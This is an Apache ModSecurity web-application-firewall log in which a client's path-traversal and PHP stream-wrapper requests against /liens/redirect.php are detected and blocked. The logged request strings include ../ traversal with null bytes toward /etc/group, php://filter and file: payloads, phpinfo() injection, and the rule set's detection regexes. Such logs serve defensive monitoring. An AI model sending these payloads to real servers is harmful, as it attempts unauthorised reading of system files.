[Tue May 12 05:06:13.985552 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: %2F..%2F found within REQUEST_URI_RAW: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2Fetc%2Fgroup%00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
[Tue May 12 05:06:13.985602 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
[Tue May 12 05:06:13.985632 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
[Tue May 12 05:06:13.985662 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /liens/redirect.php?url=https://okayperiod.com/fers-retirement/survivors/&url=../..//../..//../..//../..//../..//../..//../..//../..//etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
[Tue May 12 05:06:13.985713 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: ../../../../../../../../../../../../../../../../etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
[Tue May 12 05:06:13.986368 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 33)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
[Tue May 12 05:06:13.986670 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 33 - SQLI=0,XSS=0,RFI=0,LFI=25,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJTue9Sp-pIv_Bb68VwAAAVA"]
[Tue May 12 05:06:14.082079 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WQAAAVA"]
[Tue May 12 05:06:14.082217 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WQAAAVA"]
[Tue May 12 05:06:14.082736 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WQAAAVA"]
[Tue May 12 05:06:14.082976 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WQAAAVA"]
[Tue May 12 05:06:14.178610 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WgAAAVA"]
[Tue May 12 05:06:14.178664 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WgAAAVA"]
[Tue May 12 05:06:14.178875 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WgAAAVA"]
[Tue May 12 05:06:14.179058 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/resource=/etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WgAAAVA"]
[Tue May 12 05:06:14.179583 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WgAAAVA"]
[Tue May 12 05:06:14.179821 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WgAAAVA"]
[Tue May 12 05:06:14.275794 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: file:/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WwAAAVA"]
[Tue May 12 05:06:14.276409 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WwAAAVA"]
[Tue May 12 05:06:14.276651 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68WwAAAVA"]
[Tue May 12 05:06:14.372228 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XAAAAVA"]
[Tue May 12 05:06:14.372272 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XAAAAVA"]
[Tue May 12 05:06:14.372485 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: file:/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XAAAAVA"]
[Tue May 12 05:06:14.373063 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XAAAAVA"]
[Tue May 12 05:06:14.373322 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XAAAAVA"]
[Tue May 12 05:06:14.469144 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XQAAAVA"]
[Tue May 12 05:06:14.469271 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XQAAAVA"]
[Tue May 12 05:06:14.469809 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XQAAAVA"]
[Tue May 12 05:06:14.470057 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XQAAAVA"]
[Tue May 12 05:06:14.565435 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XgAAAVA"]
[Tue May 12 05:06:14.565489 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XgAAAVA"]
[Tue May 12 05:06:14.565704 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Matched phrase "etc/group" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/group found within ARGS:url: php:/filter/read=string.rot13/resource=/etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XgAAAVA"]
[Tue May 12 05:06:14.565815 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://filter found within ARGS:url: php://filter/read=string.rot13/resource=/etc/group\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XgAAAVA"]
[Tue May 12 05:06:14.566400 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XgAAAVA"]
[Tue May 12 05:06:14.566644 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKZJjue9Sp-pIv_Bb68XgAAAVA"]
[Tue May 12 05:06:14.666536 2026] [security2:error] [pid 1730207:tid 1730225] [client 165.227.39.67:56246] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "174"] [id "933160"] [rev "1"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: phpinfo();phpinfo();phpinfo() found within ARGS:url: phpinfo();phpinfo();phpinfo();"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] 